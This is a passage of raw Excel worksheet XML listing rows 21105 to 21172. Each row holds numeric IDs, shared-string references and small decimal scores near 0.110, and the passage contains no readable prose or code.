        <v>20368</v>
      </c>
      <c r="D21105" s="2">
        <v>1.0</v>
      </c>
      <c r="E21105" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21105" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21106" ht="15.75" customHeight="1">
      <c r="A21106" s="1">
        <v>21429.0</v>
      </c>
      <c r="B21106" s="2">
        <v>2.2148135E7</v>
      </c>
      <c r="C21106" s="2" t="s">
        <v>20369</v>
      </c>
      <c r="D21106" s="2">
        <v>1.0</v>
      </c>
      <c r="E21106" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21106" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21107" ht="15.75" customHeight="1">
      <c r="A21107" s="1">
        <v>23446.0</v>
      </c>
      <c r="B21107" s="2">
        <v>5671042.0</v>
      </c>
      <c r="C21107" s="2" t="s">
        <v>20370</v>
      </c>
      <c r="D21107" s="2">
        <v>1.0</v>
      </c>
      <c r="E21107" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21107" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21108" ht="15.75" customHeight="1">
      <c r="A21108" s="1">
        <v>24635.0</v>
      </c>
      <c r="B21108" s="2">
        <v>1.1478E7</v>
      </c>
      <c r="C21108" s="2" t="s">
        <v>20371</v>
      </c>
      <c r="D21108" s="2">
        <v>1.0</v>
      </c>
      <c r="E21108" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21108" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21109" ht="15.75" customHeight="1">
      <c r="A21109" s="1">
        <v>25076.0</v>
      </c>
      <c r="B21109" s="2">
        <v>1.2881708E7</v>
      </c>
      <c r="C21109" s="2" t="s">
        <v>20372</v>
      </c>
      <c r="D21109" s="2">
        <v>1.0</v>
      </c>
      <c r="E21109" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21109" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21110" ht="15.75" customHeight="1">
      <c r="A21110" s="1">
        <v>25274.0</v>
      </c>
      <c r="B21110" s="2">
        <v>1.339492E7</v>
      </c>
      <c r="C21110" s="2" t="s">
        <v>20373</v>
      </c>
      <c r="D21110" s="2">
        <v>1.0</v>
      </c>
      <c r="E21110" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21110" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21111" ht="15.75" customHeight="1">
      <c r="A21111" s="1">
        <v>27230.0</v>
      </c>
      <c r="B21111" s="2">
        <v>2.1042184E7</v>
      </c>
      <c r="C21111" s="2" t="s">
        <v>20374</v>
      </c>
      <c r="D21111" s="2">
        <v>1.0</v>
      </c>
      <c r="E21111" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21111" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21112" ht="15.75" customHeight="1">
      <c r="A21112" s="1">
        <v>29667.0</v>
      </c>
      <c r="B21112" s="2">
        <v>3.3952722E7</v>
      </c>
      <c r="C21112" s="2" t="s">
        <v>20375</v>
      </c>
      <c r="D21112" s="2">
        <v>1.0</v>
      </c>
      <c r="E21112" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21112" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21113" ht="15.75" customHeight="1">
      <c r="A21113" s="1">
        <v>30546.0</v>
      </c>
      <c r="B21113" s="2">
        <v>4.0619264E7</v>
      </c>
      <c r="C21113" s="2" t="s">
        <v>20376</v>
      </c>
      <c r="D21113" s="2">
        <v>1.0</v>
      </c>
      <c r="E21113" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21113" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21114" ht="15.75" customHeight="1">
      <c r="A21114" s="1">
        <v>30564.0</v>
      </c>
      <c r="B21114" s="2">
        <v>4.0887574E7</v>
      </c>
      <c r="C21114" s="2" t="s">
        <v>20377</v>
      </c>
      <c r="D21114" s="2">
        <v>1.0</v>
      </c>
      <c r="E21114" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21114" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21115" ht="15.75" customHeight="1">
      <c r="A21115" s="1">
        <v>30594.0</v>
      </c>
      <c r="B21115" s="2">
        <v>4.1234507E7</v>
      </c>
      <c r="C21115" s="2" t="s">
        <v>20378</v>
      </c>
      <c r="D21115" s="2">
        <v>1.0</v>
      </c>
      <c r="E21115" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21115" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21116" ht="15.75" customHeight="1">
      <c r="A21116" s="1">
        <v>31034.0</v>
      </c>
      <c r="B21116" s="2">
        <v>4.7813759E7</v>
      </c>
      <c r="C21116" s="2" t="s">
        <v>20379</v>
      </c>
      <c r="D21116" s="2">
        <v>1.0</v>
      </c>
      <c r="E21116" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21116" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21117" ht="15.75" customHeight="1">
      <c r="A21117" s="1">
        <v>31360.0</v>
      </c>
      <c r="B21117" s="2">
        <v>4987625.0</v>
      </c>
      <c r="C21117" s="2" t="s">
        <v>20380</v>
      </c>
      <c r="D21117" s="2">
        <v>1.0</v>
      </c>
      <c r="E21117" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21117" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21118" ht="15.75" customHeight="1">
      <c r="A21118" s="1">
        <v>32191.0</v>
      </c>
      <c r="B21118" s="2">
        <v>5474638.0</v>
      </c>
      <c r="C21118" s="2" t="s">
        <v>20381</v>
      </c>
      <c r="D21118" s="2">
        <v>1.0</v>
      </c>
      <c r="E21118" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21118" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21119" ht="15.75" customHeight="1">
      <c r="A21119" s="1">
        <v>32449.0</v>
      </c>
      <c r="B21119" s="2">
        <v>5671041.0</v>
      </c>
      <c r="C21119" s="2" t="s">
        <v>20370</v>
      </c>
      <c r="D21119" s="2">
        <v>1.0</v>
      </c>
      <c r="E21119" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21119" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21120" ht="15.75" customHeight="1">
      <c r="A21120" s="1">
        <v>32863.0</v>
      </c>
      <c r="B21120" s="2">
        <v>6286679.0</v>
      </c>
      <c r="C21120" s="2" t="s">
        <v>20382</v>
      </c>
      <c r="D21120" s="2">
        <v>1.0</v>
      </c>
      <c r="E21120" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21120" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="21121" ht="15.75" customHeight="1">
      <c r="A21121" s="1">
        <v>166.0</v>
      </c>
      <c r="B21121" s="2">
        <v>1.3777289E7</v>
      </c>
      <c r="C21121" s="2" t="s">
        <v>20383</v>
      </c>
      <c r="D21121" s="2">
        <v>1.0</v>
      </c>
      <c r="E21121" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21121" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="21122" ht="15.75" customHeight="1">
      <c r="A21122" s="1">
        <v>606.0</v>
      </c>
      <c r="B21122" s="2">
        <v>1.9380924E7</v>
      </c>
      <c r="C21122" s="2" t="s">
        <v>20384</v>
      </c>
      <c r="D21122" s="2">
        <v>1.0</v>
      </c>
      <c r="E21122" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21122" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="21123" ht="15.75" customHeight="1">
      <c r="A21123" s="1">
        <v>1092.0</v>
      </c>
      <c r="B21123" s="2">
        <v>2.3769819E7</v>
      </c>
      <c r="C21123" s="2" t="s">
        <v>20385</v>
      </c>
      <c r="D21123" s="2">
        <v>1.0</v>
      </c>
      <c r="E21123" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21123" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="21124" ht="15.75" customHeight="1">
      <c r="A21124" s="1">
        <v>3342.0</v>
      </c>
      <c r="B21124" s="2">
        <v>3.7731964E7</v>
      </c>
      <c r="C21124" s="2" t="s">
        <v>20386</v>
      </c>
      <c r="D21124" s="2">
        <v>1.0</v>
      </c>
      <c r="E21124" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21124" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="21125" ht="15.75" customHeight="1">
      <c r="A21125" s="1">
        <v>5248.0</v>
      </c>
      <c r="B21125" s="2">
        <v>4.507057E7</v>
      </c>
      <c r="C21125" s="2" t="s">
        <v>20387</v>
      </c>
      <c r="D21125" s="2">
        <v>1.0</v>
      </c>
      <c r="E21125" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21125" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="21126" ht="15.75" customHeight="1">
      <c r="A21126" s="1">
        <v>6221.0</v>
      </c>
      <c r="B21126" s="2">
        <v>4.802478E7</v>
      </c>
      <c r="C21126" s="2" t="s">
        <v>20388</v>
      </c>
      <c r="D21126" s="2">
        <v>1.0</v>
      </c>
      <c r="E21126" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21126" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="21127" ht="15.75" customHeight="1">
      <c r="A21127" s="1">
        <v>8710.0</v>
      </c>
      <c r="B21127" s="2">
        <v>5.4454265E7</v>
      </c>
      <c r="C21127" s="2" t="s">
        <v>20389</v>
      </c>
      <c r="D21127" s="2">
        <v>1.0</v>
      </c>
      <c r="E21127" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21127" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="21128" ht="15.75" customHeight="1">
      <c r="A21128" s="1">
        <v>9038.0</v>
      </c>
      <c r="B21128" s="2">
        <v>5.5046885E7</v>
      </c>
      <c r="C21128" s="2" t="s">
        <v>20390</v>
      </c>
      <c r="D21128" s="2">
        <v>1.0</v>
      </c>
      <c r="E21128" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21128" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="21129" ht="15.75" customHeight="1">
      <c r="A21129" s="1">
        <v>9571.0</v>
      </c>
      <c r="B21129" s="2">
        <v>5.605565E7</v>
      </c>
      <c r="C21129" s="2" t="s">
        <v>20391</v>
      </c>
      <c r="D21129" s="2">
        <v>1.0</v>
      </c>
      <c r="E21129" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21129" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="21130" ht="15.75" customHeight="1">
      <c r="A21130" s="1">
        <v>9646.0</v>
      </c>
      <c r="B21130" s="2">
        <v>5.6245362E7</v>
      </c>
      <c r="C21130" s="2" t="s">
        <v>20392</v>
      </c>
      <c r="D21130" s="2">
        <v>1.0</v>
      </c>
      <c r="E21130" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21130" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="21131" ht="15.75" customHeight="1">
      <c r="A21131" s="1">
        <v>9973.0</v>
      </c>
      <c r="B21131" s="2">
        <v>5.6942487E7</v>
      </c>
      <c r="C21131" s="2" t="s">
        <v>20393</v>
      </c>
      <c r="D21131" s="2">
        <v>1.0</v>
      </c>
      <c r="E21131" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21131" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="21132" ht="15.75" customHeight="1">
      <c r="A21132" s="1">
        <v>10311.0</v>
      </c>
      <c r="B21132" s="2">
        <v>5.7671533E7</v>
      </c>
      <c r="C21132" s="2" t="s">
        <v>20394</v>
      </c>
      <c r="D21132" s="2">
        <v>1.0</v>
      </c>
      <c r="E21132" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21132" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="21133" ht="15.75" customHeight="1">
      <c r="A21133" s="1">
        <v>10947.0</v>
      </c>
      <c r="B21133" s="2">
        <v>1.707946E7</v>
      </c>
      <c r="C21133" s="2" t="s">
        <v>20395</v>
      </c>
      <c r="D21133" s="2">
        <v>1.0</v>
      </c>
      <c r="E21133" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21133" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="21134" ht="15.75" customHeight="1">
      <c r="A21134" s="1">
        <v>11804.0</v>
      </c>
      <c r="B21134" s="2">
        <v>2.4419068E7</v>
      </c>
      <c r="C21134" s="2" t="s">
        <v>20396</v>
      </c>
      <c r="D21134" s="2">
        <v>1.0</v>
      </c>
      <c r="E21134" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21134" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="21135" ht="15.75" customHeight="1">
      <c r="A21135" s="1">
        <v>12056.0</v>
      </c>
      <c r="B21135" s="2">
        <v>2.6448909E7</v>
      </c>
      <c r="C21135" s="2" t="s">
        <v>20397</v>
      </c>
      <c r="D21135" s="2">
        <v>1.0</v>
      </c>
      <c r="E21135" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21135" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="21136" ht="15.75" customHeight="1">
      <c r="A21136" s="1">
        <v>12079.0</v>
      </c>
      <c r="B21136" s="2">
        <v>2.6676083E7</v>
      </c>
      <c r="C21136" s="2" t="s">
        <v>20398</v>
      </c>
      <c r="D21136" s="2">
        <v>1.0</v>
      </c>
      <c r="E21136" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21136" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="21137" ht="15.75" customHeight="1">
      <c r="A21137" s="1">
        <v>13289.0</v>
      </c>
      <c r="B21137" s="2">
        <v>3.4446804E7</v>
      </c>
      <c r="C21137" s="2" t="s">
        <v>20399</v>
      </c>
      <c r="D21137" s="2">
        <v>1.0</v>
      </c>
      <c r="E21137" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21137" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="21138" ht="15.75" customHeight="1">
      <c r="A21138" s="1">
        <v>13752.0</v>
      </c>
      <c r="B21138" s="2">
        <v>3.6486449E7</v>
      </c>
      <c r="C21138" s="2" t="s">
        <v>20400</v>
      </c>
      <c r="D21138" s="2">
        <v>1.0</v>
      </c>
      <c r="E21138" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21138" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="21139" ht="15.75" customHeight="1">
      <c r="A21139" s="1">
        <v>15706.0</v>
      </c>
      <c r="B21139" s="2">
        <v>4.395492E7</v>
      </c>
      <c r="C21139" s="2" t="s">
        <v>20401</v>
      </c>
      <c r="D21139" s="2">
        <v>1.0</v>
      </c>
      <c r="E21139" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21139" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="21140" ht="15.75" customHeight="1">
      <c r="A21140" s="1">
        <v>16402.0</v>
      </c>
      <c r="B21140" s="2">
        <v>4.6286964E7</v>
      </c>
      <c r="C21140" s="2" t="s">
        <v>20402</v>
      </c>
      <c r="D21140" s="2">
        <v>1.0</v>
      </c>
      <c r="E21140" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21140" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="21141" ht="15.75" customHeight="1">
      <c r="A21141" s="1">
        <v>16767.0</v>
      </c>
      <c r="B21141" s="2">
        <v>4.7653781E7</v>
      </c>
      <c r="C21141" s="2" t="s">
        <v>20403</v>
      </c>
      <c r="D21141" s="2">
        <v>1.0</v>
      </c>
      <c r="E21141" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21141" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="21142" ht="15.75" customHeight="1">
      <c r="A21142" s="1">
        <v>18313.0</v>
      </c>
      <c r="B21142" s="2">
        <v>5.2376641E7</v>
      </c>
      <c r="C21142" s="2" t="s">
        <v>20404</v>
      </c>
      <c r="D21142" s="2">
        <v>1.0</v>
      </c>
      <c r="E21142" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21142" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="21143" ht="15.75" customHeight="1">
      <c r="A21143" s="1">
        <v>19062.0</v>
      </c>
      <c r="B21143" s="2">
        <v>5.4596065E7</v>
      </c>
      <c r="C21143" s="2" t="s">
        <v>20405</v>
      </c>
      <c r="D21143" s="2">
        <v>1.0</v>
      </c>
      <c r="E21143" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21143" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="21144" ht="15.75" customHeight="1">
      <c r="A21144" s="1">
        <v>19200.0</v>
      </c>
      <c r="B21144" s="2">
        <v>5.4985437E7</v>
      </c>
      <c r="C21144" s="2" t="s">
        <v>20406</v>
      </c>
      <c r="D21144" s="2">
        <v>1.0</v>
      </c>
      <c r="E21144" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21144" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="21145" ht="15.75" customHeight="1">
      <c r="A21145" s="1">
        <v>19754.0</v>
      </c>
      <c r="B21145" s="2">
        <v>5.6705061E7</v>
      </c>
      <c r="C21145" s="2" t="s">
        <v>20407</v>
      </c>
      <c r="D21145" s="2">
        <v>1.0</v>
      </c>
      <c r="E21145" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21145" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="21146" ht="15.75" customHeight="1">
      <c r="A21146" s="1">
        <v>21875.0</v>
      </c>
      <c r="B21146" s="2">
        <v>2.7596876E7</v>
      </c>
      <c r="C21146" s="2" t="s">
        <v>20408</v>
      </c>
      <c r="D21146" s="2">
        <v>1.0</v>
      </c>
      <c r="E21146" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21146" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="21147" ht="15.75" customHeight="1">
      <c r="A21147" s="1">
        <v>24779.0</v>
      </c>
      <c r="B21147" s="2">
        <v>1.1898146E7</v>
      </c>
      <c r="C21147" s="2" t="s">
        <v>20409</v>
      </c>
      <c r="D21147" s="2">
        <v>1.0</v>
      </c>
      <c r="E21147" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21147" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="21148" ht="15.75" customHeight="1">
      <c r="A21148" s="1">
        <v>25621.0</v>
      </c>
      <c r="B21148" s="2">
        <v>1.4441635E7</v>
      </c>
      <c r="C21148" s="2" t="s">
        <v>20410</v>
      </c>
      <c r="D21148" s="2">
        <v>1.0</v>
      </c>
      <c r="E21148" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21148" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="21149" ht="15.75" customHeight="1">
      <c r="A21149" s="1">
        <v>30372.0</v>
      </c>
      <c r="B21149" s="2">
        <v>3.843766E7</v>
      </c>
      <c r="C21149" s="2" t="s">
        <v>20411</v>
      </c>
      <c r="D21149" s="2">
        <v>1.0</v>
      </c>
      <c r="E21149" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21149" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="21150" ht="15.75" customHeight="1">
      <c r="A21150" s="1">
        <v>30786.0</v>
      </c>
      <c r="B21150" s="2">
        <v>4.482202E7</v>
      </c>
      <c r="C21150" s="2" t="s">
        <v>20412</v>
      </c>
      <c r="D21150" s="2">
        <v>1.0</v>
      </c>
      <c r="E21150" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21150" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="21151" ht="15.75" customHeight="1">
      <c r="A21151" s="1">
        <v>32039.0</v>
      </c>
      <c r="B21151" s="2">
        <v>5369911.0</v>
      </c>
      <c r="C21151" s="2" t="s">
        <v>20413</v>
      </c>
      <c r="D21151" s="2">
        <v>1.0</v>
      </c>
      <c r="E21151" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21151" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="21152" ht="15.75" customHeight="1">
      <c r="A21152" s="1">
        <v>32647.0</v>
      </c>
      <c r="B21152" s="2">
        <v>5872466.0</v>
      </c>
      <c r="C21152" s="2" t="s">
        <v>20414</v>
      </c>
      <c r="D21152" s="2">
        <v>1.0</v>
      </c>
      <c r="E21152" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21152" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="21153" ht="15.75" customHeight="1">
      <c r="A21153" s="1">
        <v>33077.0</v>
      </c>
      <c r="B21153" s="2">
        <v>6904538.0</v>
      </c>
      <c r="C21153" s="2" t="s">
        <v>20415</v>
      </c>
      <c r="D21153" s="2">
        <v>1.0</v>
      </c>
      <c r="E21153" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21153" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="21154" ht="15.75" customHeight="1">
      <c r="A21154" s="1">
        <v>6815.0</v>
      </c>
      <c r="B21154" s="2">
        <v>4.9540298E7</v>
      </c>
      <c r="C21154" s="2" t="s">
        <v>20416</v>
      </c>
      <c r="D21154" s="2">
        <v>1.0</v>
      </c>
      <c r="E21154" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21154" s="2">
        <v>0.110082304526749</v>
      </c>
    </row>
    <row r="21155" ht="15.75" customHeight="1">
      <c r="A21155" s="1">
        <v>353.0</v>
      </c>
      <c r="B21155" s="2">
        <v>1.6046757E7</v>
      </c>
      <c r="C21155" s="2" t="s">
        <v>20417</v>
      </c>
      <c r="D21155" s="2">
        <v>1.0</v>
      </c>
      <c r="E21155" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21155" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="21156" ht="15.75" customHeight="1">
      <c r="A21156" s="1">
        <v>851.0</v>
      </c>
      <c r="B21156" s="2">
        <v>2.1716426E7</v>
      </c>
      <c r="C21156" s="2" t="s">
        <v>20418</v>
      </c>
      <c r="D21156" s="2">
        <v>1.0</v>
      </c>
      <c r="E21156" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21156" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="21157" ht="15.75" customHeight="1">
      <c r="A21157" s="1">
        <v>940.0</v>
      </c>
      <c r="B21157" s="2">
        <v>2.2431998E7</v>
      </c>
      <c r="C21157" s="2" t="s">
        <v>20419</v>
      </c>
      <c r="D21157" s="2">
        <v>1.0</v>
      </c>
      <c r="E21157" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21157" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="21158" ht="15.75" customHeight="1">
      <c r="A21158" s="1">
        <v>1188.0</v>
      </c>
      <c r="B21158" s="2">
        <v>2.4677182E7</v>
      </c>
      <c r="C21158" s="2" t="s">
        <v>20420</v>
      </c>
      <c r="D21158" s="2">
        <v>1.0</v>
      </c>
      <c r="E21158" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21158" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="21159" ht="15.75" customHeight="1">
      <c r="A21159" s="1">
        <v>3067.0</v>
      </c>
      <c r="B21159" s="2">
        <v>3.6512243E7</v>
      </c>
      <c r="C21159" s="2" t="s">
        <v>20421</v>
      </c>
      <c r="D21159" s="2">
        <v>1.0</v>
      </c>
      <c r="E21159" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21159" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="21160" ht="15.75" customHeight="1">
      <c r="A21160" s="1">
        <v>3802.0</v>
      </c>
      <c r="B21160" s="2">
        <v>3.999185E7</v>
      </c>
      <c r="C21160" s="2" t="s">
        <v>20422</v>
      </c>
      <c r="D21160" s="2">
        <v>1.0</v>
      </c>
      <c r="E21160" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21160" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="21161" ht="15.75" customHeight="1">
      <c r="A21161" s="1">
        <v>4141.0</v>
      </c>
      <c r="B21161" s="2">
        <v>4.1407261E7</v>
      </c>
      <c r="C21161" s="2" t="s">
        <v>20423</v>
      </c>
      <c r="D21161" s="2">
        <v>1.0</v>
      </c>
      <c r="E21161" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21161" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="21162" ht="15.75" customHeight="1">
      <c r="A21162" s="1">
        <v>4845.0</v>
      </c>
      <c r="B21162" s="2">
        <v>4.3695073E7</v>
      </c>
      <c r="C21162" s="2" t="s">
        <v>20424</v>
      </c>
      <c r="D21162" s="2">
        <v>1.0</v>
      </c>
      <c r="E21162" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21162" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="21163" ht="15.75" customHeight="1">
      <c r="A21163" s="1">
        <v>5775.0</v>
      </c>
      <c r="B21163" s="2">
        <v>4.6732017E7</v>
      </c>
      <c r="C21163" s="2" t="s">
        <v>20425</v>
      </c>
      <c r="D21163" s="2">
        <v>1.0</v>
      </c>
      <c r="E21163" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21163" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="21164" ht="15.75" customHeight="1">
      <c r="A21164" s="1">
        <v>6446.0</v>
      </c>
      <c r="B21164" s="2">
        <v>4.8589915E7</v>
      </c>
      <c r="C21164" s="2" t="s">
        <v>20426</v>
      </c>
      <c r="D21164" s="2">
        <v>1.0</v>
      </c>
      <c r="E21164" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21164" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="21165" ht="15.75" customHeight="1">
      <c r="A21165" s="1">
        <v>7029.0</v>
      </c>
      <c r="B21165" s="2">
        <v>5.0115682E7</v>
      </c>
      <c r="C21165" s="2" t="s">
        <v>20427</v>
      </c>
      <c r="D21165" s="2">
        <v>1.0</v>
      </c>
      <c r="E21165" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21165" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="21166" ht="15.75" customHeight="1">
      <c r="A21166" s="1">
        <v>11198.0</v>
      </c>
      <c r="B21166" s="2">
        <v>1.9891003E7</v>
      </c>
      <c r="C21166" s="2" t="s">
        <v>20428</v>
      </c>
      <c r="D21166" s="2">
        <v>1.0</v>
      </c>
      <c r="E21166" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21166" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="21167" ht="15.75" customHeight="1">
      <c r="A21167" s="1">
        <v>11761.0</v>
      </c>
      <c r="B21167" s="2">
        <v>2.4178824E7</v>
      </c>
      <c r="C21167" s="2" t="s">
        <v>20429</v>
      </c>
      <c r="D21167" s="2">
        <v>1.0</v>
      </c>
      <c r="E21167" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21167" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="21168" ht="15.75" customHeight="1">
      <c r="A21168" s="1">
        <v>12757.0</v>
      </c>
      <c r="B21168" s="2">
        <v>3.1134802E7</v>
      </c>
      <c r="C21168" s="2" t="s">
        <v>20430</v>
      </c>
      <c r="D21168" s="2">
        <v>1.0</v>
      </c>
      <c r="E21168" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21168" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="21169" ht="15.75" customHeight="1">
      <c r="A21169" s="1">
        <v>14123.0</v>
      </c>
      <c r="B21169" s="2">
        <v>3.7834639E7</v>
      </c>
      <c r="C21169" s="2" t="s">
        <v>20431</v>
      </c>
      <c r="D21169" s="2">
        <v>1.0</v>
      </c>
      <c r="E21169" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21169" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="21170" ht="15.75" customHeight="1">
      <c r="A21170" s="1">
        <v>14587.0</v>
      </c>
      <c r="B21170" s="2">
        <v>4.0149237E7</v>
      </c>
      <c r="C21170" s="2" t="s">
        <v>20432</v>
      </c>
      <c r="D21170" s="2">
        <v>1.0</v>
      </c>
      <c r="E21170" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21170" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="21171" ht="15.75" customHeight="1">
      <c r="A21171" s="1">
        <v>16373.0</v>
      </c>
      <c r="B21171" s="2">
        <v>4.616027E7</v>
      </c>
      <c r="C21171" s="2" t="s">
        <v>20433</v>
      </c>
      <c r="D21171" s="2">
        <v>1.0</v>
      </c>
      <c r="E21171" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21171" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="21172" ht="15.75" customHeight="1">
      <c r="A21172" s="1">
        <v>18006.0</v>
      </c>
      <c r="B21172" s="2">
        <v>5.1438229E7</v>
      </c>
      <c r="C21172" s="2" t="s">
        <v>20434</v>
      </c>
